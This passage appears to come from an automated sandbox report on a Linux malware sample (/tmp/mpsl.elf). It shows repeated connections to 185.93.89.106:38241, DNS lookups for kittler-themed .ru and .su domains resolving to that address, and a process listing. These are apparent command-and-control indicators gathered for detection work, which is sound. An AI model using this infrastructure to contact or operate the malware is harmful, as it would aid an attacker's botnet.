                                                                                      Feb 10, 2025 21:08:34.345139980 CET3824139822185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:34.345252037 CET3982238241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:34.345299006 CET3982238241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:35.353775978 CET3982438241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:35.359070063 CET3824139824185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:35.359123945 CET3982438241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:35.359739065 CET3982438241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:35.364459991 CET3824139824185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:35.364496946 CET3982438241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:35.369260073 CET3824139824185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:35.964771986 CET3824139824185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:35.964854956 CET3982438241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:35.964910030 CET3982438241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:36.972985983 CET3982638241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:36.977808952 CET3824139826185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:36.977878094 CET3982638241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:36.978432894 CET3982638241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:36.983191967 CET3824139826185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:36.983230114 CET3982638241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:36.987962008 CET3824139826185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:37.587028980 CET3824139826185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:37.587090969 CET3982638241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:37.587131023 CET3982638241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:38.595156908 CET3982838241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:38.599926949 CET3824139828185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:38.599982977 CET3982838241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:38.600672007 CET3982838241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:38.605387926 CET3824139828185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:38.605433941 CET3982838241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:38.610239029 CET3824139828185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:39.222249031 CET3824139828185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:39.222323895 CET3982838241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:39.222393036 CET3982838241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:40.230915070 CET3983038241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:40.235749006 CET3824139830185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:40.235795021 CET3983038241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:40.236463070 CET3983038241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:40.241199017 CET3824139830185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:40.241240978 CET3983038241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:40.246001959 CET3824139830185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:40.856921911 CET3824139830185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:40.856992006 CET3983038241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:40.857028008 CET3983038241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:41.865583897 CET3983238241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:41.870359898 CET3824139832185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:41.870408058 CET3983238241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:41.871026993 CET3983238241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:41.875768900 CET3824139832185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:41.875813961 CET3983238241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:41.880582094 CET3824139832185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:42.493860960 CET3824139832185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:42.494009018 CET3983238241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:42.494030952 CET3983238241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:43.408559084 CET42836443192.168.2.2391.189.91.43
                                                                                      Feb 10, 2025 21:08:43.502046108 CET3983438241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:43.506890059 CET3824139834185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:43.506943941 CET3983438241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:43.507509947 CET3983438241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:43.512305975 CET3824139834185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:43.512388945 CET3983438241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:43.517141104 CET3824139834185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:44.120965004 CET3824139834185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:44.121037006 CET3983438241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:44.121073008 CET3983438241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:45.177984953 CET3983638241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:45.183707952 CET3824139836185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:45.183770895 CET3983638241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:45.184461117 CET3983638241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:45.189239025 CET3824139836185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:45.189292908 CET3983638241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:45.194047928 CET3824139836185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:45.788135052 CET3824139836185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:45.788271904 CET3983638241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:45.788315058 CET3983638241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:46.796659946 CET3983838241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:46.801441908 CET3824139838185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:46.801496983 CET3983838241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:46.802066088 CET3983838241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:46.806797028 CET3824139838185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:46.806848049 CET3983838241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:46.811614037 CET3824139838185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:49.551817894 CET4251680192.168.2.23109.202.202.202
                                                                                      Feb 10, 2025 21:08:56.810877085 CET3983838241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:08:56.815673113 CET3824139838185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:56.984003067 CET3824139838185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:08:56.984206915 CET3983838241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:09:14.124475002 CET43928443192.168.2.2391.189.91.42
                                                                                      Feb 10, 2025 21:09:57.022561073 CET3983838241192.168.2.23185.93.89.106
                                                                                      Feb 10, 2025 21:09:57.027432919 CET3824139838185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:09:57.200627089 CET3824139838185.93.89.106192.168.2.23
                                                                                      Feb 10, 2025 21:09:57.200789928 CET3983838241192.168.2.23185.93.89.106
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Feb 10, 2025 21:08:10.520950079 CET5857253192.168.2.238.8.8.8
                                                                                      Feb 10, 2025 21:08:10.650227070 CET53585728.8.8.8192.168.2.23
                                                                                      Feb 10, 2025 21:08:12.358704090 CET5451453192.168.2.238.8.8.8
                                                                                      Feb 10, 2025 21:08:12.500832081 CET53545148.8.8.8192.168.2.23
                                                                                      Feb 10, 2025 21:08:14.437884092 CET3816153192.168.2.238.8.8.8
                                                                                      Feb 10, 2025 21:08:14.491544962 CET53381618.8.8.8192.168.2.23
                                                                                      Feb 10, 2025 21:08:16.132406950 CET4606753192.168.2.238.8.8.8
                                                                                      Feb 10, 2025 21:08:16.138947010 CET53460678.8.8.8192.168.2.23
                                                                                      Feb 10, 2025 21:08:17.751856089 CET4582553192.168.2.238.8.8.8
                                                                                      Feb 10, 2025 21:08:17.761528015 CET53458258.8.8.8192.168.2.23
                                                                                      Feb 10, 2025 21:08:19.372587919 CET3514353192.168.2.238.8.8.8
                                                                                      Feb 10, 2025 21:08:19.380474091 CET53351438.8.8.8192.168.2.23
                                                                                      Feb 10, 2025 21:08:20.993055105 CET3986353192.168.2.238.8.8.8
                                                                                      Feb 10, 2025 21:08:20.999267101 CET53398638.8.8.8192.168.2.23
                                                                                      Feb 10, 2025 21:08:22.627453089 CET4301753192.168.2.238.8.8.8
                                                                                      Feb 10, 2025 21:08:22.633687973 CET53430178.8.8.8192.168.2.23
                                                                                      Feb 10, 2025 21:08:24.271878004 CET3389353192.168.2.238.8.8.8
                                                                                      Feb 10, 2025 21:08:24.278270960 CET53338938.8.8.8192.168.2.23
                                                                                      Feb 10, 2025 21:08:26.061697006 CET5691753192.168.2.238.8.8.8
                                                                                      Feb 10, 2025 21:08:26.071985960 CET53569178.8.8.8192.168.2.23
                                                                                      Feb 10, 2025 21:08:27.715626001 CET4372653192.168.2.238.8.8.8
                                                                                      Feb 10, 2025 21:08:27.723109961 CET53437268.8.8.8192.168.2.23
                                                                                      Feb 10, 2025 21:08:29.354259968 CET3444753192.168.2.238.8.8.8
                                                                                      Feb 10, 2025 21:08:29.462342024 CET53344478.8.8.8192.168.2.23
                                                                                      Feb 10, 2025 21:08:32.040360928 CET3867553192.168.2.238.8.8.8
                                                                                      Feb 10, 2025 21:08:32.047696114 CET53386758.8.8.8192.168.2.23
                                                                                      Feb 10, 2025 21:08:33.669928074 CET4642553192.168.2.238.8.8.8
                                                                                      Feb 10, 2025 21:08:33.676271915 CET53464258.8.8.8192.168.2.23
                                                                                      Feb 10, 2025 21:08:35.346399069 CET4187353192.168.2.238.8.8.8
                                                                                      Feb 10, 2025 21:08:35.353346109 CET53418738.8.8.8192.168.2.23
                                                                                      Feb 10, 2025 21:08:36.966267109 CET4316453192.168.2.238.8.8.8
                                                                                      Feb 10, 2025 21:08:36.972577095 CET53431648.8.8.8192.168.2.23
                                                                                      Feb 10, 2025 21:08:38.588310957 CET3829653192.168.2.238.8.8.8
                                                                                      Feb 10, 2025 21:08:38.594436884 CET53382968.8.8.8192.168.2.23
                                                                                      Feb 10, 2025 21:08:40.224253893 CET3802653192.168.2.238.8.8.8
                                                                                      Feb 10, 2025 21:08:40.230556011 CET53380268.8.8.8192.168.2.23
                                                                                      Feb 10, 2025 21:08:41.858511925 CET5288053192.168.2.238.8.8.8
                                                                                      Feb 10, 2025 21:08:41.865231991 CET53528808.8.8.8192.168.2.23
                                                                                      Feb 10, 2025 21:08:43.495521069 CET5947553192.168.2.238.8.8.8
                                                                                      Feb 10, 2025 21:08:43.501693010 CET53594758.8.8.8192.168.2.23
                                                                                      Feb 10, 2025 21:08:45.122529984 CET5706553192.168.2.238.8.8.8
                                                                                      Feb 10, 2025 21:08:45.177478075 CET53570658.8.8.8192.168.2.23
                                                                                      Feb 10, 2025 21:08:46.789988995 CET4047153192.168.2.238.8.8.8
                                                                                      Feb 10, 2025 21:08:46.796317101 CET53404718.8.8.8192.168.2.23
                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Feb 10, 2025 21:08:10.520950079 CET192.168.2.238.8.8.80xc377Standard query (0)newkittler.ruA (IP address)IN (0x0001)false
                                                                                      Feb 10, 2025 21:08:12.358704090 CET192.168.2.238.8.8.80xc78cStandard query (0)gokittler.ru. [malformed]256428false
                                                                                      Feb 10, 2025 21:08:14.437884092 CET192.168.2.238.8.8.80xcdb6Standard query (0)cats-master.ruA (IP address)IN (0x0001)false
                                                                                      Feb 10, 2025 21:08:16.132406950 CET192.168.2.238.8.8.80x5402Standard query (0)kittler.ru. [malformed]256432false
                                                                                      Feb 10, 2025 21:08:17.751856089 CET192.168.2.238.8.8.80xd419Standard query (0)kittlerer.ruA (IP address)IN (0x0001)false
                                                                                      Feb 10, 2025 21:08:19.372587919 CET192.168.2.238.8.8.80xc955Standard query (0)cats-master.ru. [malformed]256435false
                                                                                      Feb 10, 2025 21:08:20.993055105 CET192.168.2.238.8.8.80x1149Standard query (0)thekittler.ru. [malformed]256436false
                                                                                      Feb 10, 2025 21:08:22.627453089 CET192.168.2.238.8.8.80x11ecStandard query (0)qittler.ru. [malformed]256438false
                                                                                      Feb 10, 2025 21:08:24.271878004 CET192.168.2.238.8.8.80xc2acStandard query (0)kittler.ru. [malformed]256440false
                                                                                      Feb 10, 2025 21:08:26.061697006 CET192.168.2.238.8.8.80xd440Standard query (0)cats-master.ruA (IP address)IN (0x0001)false
                                                                                      Feb 10, 2025 21:08:27.715626001 CET192.168.2.238.8.8.80x920bStandard query (0)thekittler.ru. [malformed]256443false
                                                                                      Feb 10, 2025 21:08:29.354259968 CET192.168.2.238.8.8.80x17caStandard query (0)cuttiecats.ru. [malformed]256445false
                                                                                      Feb 10, 2025 21:08:32.040360928 CET192.168.2.238.8.8.80x73e1Standard query (0)polizei.su. [malformed]256448false
                                                                                      Feb 10, 2025 21:08:33.669928074 CET192.168.2.238.8.8.80x48bStandard query (0)kittlez.ru. [malformed]256449false
                                                                                      Feb 10, 2025 21:08:35.346399069 CET192.168.2.238.8.8.80xca24Standard query (0)cuttiecats.ru. [malformed]256451false
                                                                                      Feb 10, 2025 21:08:36.966267109 CET192.168.2.238.8.8.80x35f3Standard query (0)thekittler.ru. [malformed]256452false
                                                                                      Feb 10, 2025 21:08:38.588310957 CET192.168.2.238.8.8.80x481bStandard query (0)thekittler.ru. [malformed]256454false
                                                                                      Feb 10, 2025 21:08:40.224253893 CET192.168.2.238.8.8.80x64cfStandard query (0)mykittler.ru. [malformed]256456false
                                                                                      Feb 10, 2025 21:08:41.858511925 CET192.168.2.238.8.8.80x5a8dStandard query (0)cat-are-here.ru. [malformed]256457false
                                                                                      Feb 10, 2025 21:08:43.495521069 CET192.168.2.238.8.8.80xb92dStandard query (0)mykittler.ru. [malformed]256459false
                                                                                      Feb 10, 2025 21:08:45.122529984 CET192.168.2.238.8.8.80xbb6aStandard query (0)newkittler.ruA (IP address)IN (0x0001)false
                                                                                      Feb 10, 2025 21:08:46.789988995 CET192.168.2.238.8.8.80x9856Standard query (0)qittler.ru. [malformed]256462false
                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Feb 10, 2025 21:08:10.650227070 CET8.8.8.8192.168.2.230xc377No error (0)newkittler.ru185.93.89.106A (IP address)IN (0x0001)false
                                                                                      Feb 10, 2025 21:08:14.491544962 CET8.8.8.8192.168.2.230xcdb6No error (0)cats-master.ru185.93.89.106A (IP address)IN (0x0001)false
                                                                                      Feb 10, 2025 21:08:17.761528015 CET8.8.8.8192.168.2.230xd419No error (0)kittlerer.ru185.93.89.106A (IP address)IN (0x0001)false
                                                                                      Feb 10, 2025 21:08:26.071985960 CET8.8.8.8192.168.2.230xd440No error (0)cats-master.ru185.93.89.106A (IP address)IN (0x0001)false
                                                                                      Feb 10, 2025 21:08:45.177478075 CET8.8.8.8192.168.2.230xbb6aNo error (0)newkittler.ru185.93.89.106A (IP address)IN (0x0001)false

                                                                                      System Behavior

                                                                                      Start time (UTC):20:08:08
                                                                                      Start date (UTC):10/02/2025
                                                                                      Path:/tmp/mpsl.elf
                                                                                      Arguments:/tmp/mpsl.elf
                                                                                      File size:5773336 bytes
                                                                                      MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                                      Start time (UTC):20:08:08
                                                                                      Start date (UTC):10/02/2025
                                                                                      Path:/tmp/mpsl.elf
                                                                                      Arguments:-
                                                                                      File size:5773336 bytes
                                                                                      MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                                      Start time (UTC):20:08:08
                                                                                      Start date (UTC):10/02/2025
                                                                                      Path:/tmp/mpsl.elf
                                                                                      Arguments:-
                                                                                      File size:5773336 bytes
                                                                                      MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                                      Start time (UTC):20:08:09
                                                                                      Start date (UTC):10/02/2025
                                                                                      Path:/tmp/mpsl.elf
                                                                                      Arguments:-
                                                                                      File size:5773336 bytes
                                                                                      MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                                      Start time (UTC):20:08:09
                                                                                      Start date (UTC):10/02/2025
                                                                                      Path:/tmp/mpsl.elf
                                                                                      Arguments:-
                                                                                      File size:5773336 bytes
                                                                                      MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                                      Start time (UTC):20:08:09
                                                                                      Start date (UTC):10/02/2025
                                                                                      Path:/usr/sbin/gdm3
                                                                                      Arguments:-
                                                                                      File size:453296 bytes
                                                                                      MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                                                      Start time (UTC):20:08:09
                                                                                      Start date (UTC):10/02/2025
                                                                                      Path:/etc/gdm3/PrimeOff/Default
                                                                                      Arguments:/etc/gdm3/PrimeOff/Default
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time (UTC):20:08:09
                                                                                      Start date (UTC):10/02/2025
                                                                                      Path:/usr/bin/xfce4-session
                                                                                      Arguments:-
                                                                                      File size:264752 bytes
                                                                                      MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                      Start time (UTC):20:08:10
                                                                                      Start date (UTC):10/02/2025
                                                                                      Path:/usr/sbin/gdm3
                                                                                      Arguments:-
                                                                                      File size:453296 bytes
                                                                                      MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                                                      Start time (UTC):20:08:10
                                                                                      Start date (UTC):10/02/2025
                                                                                      Path:/etc/gdm3/PrimeOff/Default
                                                                                      Arguments:/etc/gdm3/PrimeOff/Default
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time (UTC):20:08:10
                                                                                      Start date (UTC):10/02/2025
                                                                                      Path:/usr/bin/xfce4-session
                                                                                      Arguments:-
                                                                                      File size:264752 bytes
                                                                                      MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                      Start time (UTC):20:08:10
                                                                                      Start date (UTC):10/02/2025
                                                                                      Path:/usr/bin/xfce4-session
                                                                                      Arguments:-
                                                                                      File size:264752 bytes
                                                                                      MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                      Start time (UTC):20:08:10
                                                                                      Start date (UTC):10/02/2025
                                                                                      Path:/usr/bin/rm
                                                                                      Arguments:rm -f /home/saturnino/.cache/sessions/Thunar-2ec9153f1-6fa0-4067-96b1-e5fe875b1e51
                                                                                      File size:72056 bytes
                                                                                      MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                                      Start time (UTC):20:08:10
                                                                                      Start date (UTC):10/02/2025
                                                                                      Path:/usr/bin/xfce4-session
                                                                                      Arguments:-
                                                                                      File size:264752 bytes
                                                                                      MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                      Start time (UTC):20:08:10
                                                                                      Start date (UTC):10/02/2025
                                                                                      Path:/usr/bin/xfce4-session
                                                                                      Arguments:-
                                                                                      File size:264752 bytes
                                                                                      MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                      Start time (UTC):20:08:10
                                                                                      Start date (UTC):10/02/2025
                                                                                      Path:/usr/bin/xfwm4
                                                                                      Arguments:xfwm4 --display :1.0 --sm-client-id 2389ab8d9-421f-49fc-90ad-c6cc4c15ac4c
                                                                                      File size:420424 bytes
                                                                                      MD5 hash:59defa3c00cc30d85ed77b738d55e9da

                                                                                      Start time (UTC):20:08:10
                                                                                      Start date (UTC):10/02/2025
                                                                                      Path:/usr/bin/xfce4-session
                                                                                      Arguments:-
                                                                                      File size:264752 bytes
                                                                                      MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                      Start time (UTC):20:08:10
                                                                                      Start date (UTC):10/02/2025
                                                                                      Path:/usr/bin/xfdesktop
                                                                                      Arguments:xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
                                                                                      File size:473520 bytes
                                                                                      MD5 hash:dfb13e1581f80065dcea16f2476f16f2

                                                                                      Start time (UTC):20:08:10
                                                                                      Start date (UTC):10/02/2025
                                                                                      Path:/usr/bin/xfce4-session
                                                                                      Arguments:-
                                                                                      File size:264752 bytes
                                                                                      MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                      Start time (UTC):20:08:10
                                                                                      Start date (UTC):10/02/2025
                                                                                      Path:/usr/bin/xfce4-panel
                                                                                      Arguments:xfce4-panel --display :1.0 --sm-client-id 2b4cc744e-8b9d-436f-9a4a-312b40faa2ec
                                                                                      File size:375768 bytes
                                                                                      MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                                                      Start time (UTC):20:08:10
                                                                                      Start date (UTC):10/02/2025
                                                                                      Path:/usr/bin/xfce4-session
                                                                                      Arguments:-
                                                                                      File size:264752 bytes
                                                                                      MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                      Start time (UTC):20:08:10
                                                                                      Start date (UTC):10/02/2025
                                                                                      Path:/usr/bin/xfwm4
                                                                                      Arguments:xfwm4 --display :1.0 --sm-client-id 2389ab8d9-421f-49fc-90ad-c6cc4c15ac4c
                                                                                      File size:420424 bytes
                                                                                      MD5 hash:59defa3c00cc30d85ed77b738d55e9da

                                                                                      Start time (UTC):20:08:10
                                                                                      Start date (UTC):10/02/2025
                                                                                      Path:/usr/bin/xfce4-session
                                                                                      Arguments:-
                                                                                      File size:264752 bytes
                                                                                      MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                      Start time (UTC):20:08:10
                                                                                      Start date (UTC):10/02/2025
                                                                                      Path:/usr/bin/xfce4-session
                                                                                      Arguments:-
                                                                                      File size:264752 bytes
                                                                                      MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                      Start time (UTC):20:08:10
                                                                                      Start date (UTC):10/02/2025
                                                                                      Path:/usr/bin/xfce4-session
                                                                                      Arguments:-
                                                                                      File size:264752 bytes
                                                                                      MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                      Start time (UTC):20:08:10
                                                                                      Start date (UTC):10/02/2025
                                                                                      Path:/usr/bin/xfwm4
                                                                                      Arguments:xfwm4 --display :1.0 --sm-client-id 2389ab8d9-421f-49fc-90ad-c6cc4c15ac4c
                                                                                      File size:420424 bytes
                                                                                      MD5 hash:59defa3c00cc30d85ed77b738d55e9da

                                                                                      Start time (UTC):20:08:11
                                                                                      Start date (UTC):10/02/2025
                                                                                      Path:/usr/bin/xfce4-session
                                                                                      Arguments:-
                                                                                      File size:264752 bytes
                                                                                      MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                                                                      Start time (UTC):20:08:11
                                                                                      Start date (UTC):10/02/2025
                                                                                      Path:/usr/bin/xfdesktop
                                                                                      Arguments:xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
                                                                                      File size:473520 bytes
                                                                                      MD5 hash:dfb13e1581f80065dcea16f2476f16f2